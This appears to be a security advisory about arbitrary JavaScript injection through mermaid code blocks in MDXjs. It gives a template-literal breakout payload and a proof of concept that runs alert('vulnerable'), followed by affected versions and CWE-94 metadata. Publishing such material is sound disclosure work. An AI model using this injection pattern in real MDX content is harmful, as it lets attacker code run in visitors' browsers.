Arbitary javascript injection
Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs
` + (function () {
// Put Javascript code here
return ''
}()) + `
The block below shows a valid mermaid code block
```mermaid
graph TD;
A-->B;
A-->C;
B-->D;
C-->D;
```
The same block but with the exploit added
```mermaid
` + (function () {
alert('vulnerable')
return ''
}()) + `
graph TD;
A-->B;
A-->C;
B-->D;
C-->D;
```
1.3.0 and 2.0.0-rc2
None known
{ "nvd_published_at": "2022-08-29T18:15:00Z", "github_reviewed_at": "2022-08-31T22:26:11Z", "severity": "LOW", "github_reviewed": true, "cwe_ids": [ "CWE-94" ] }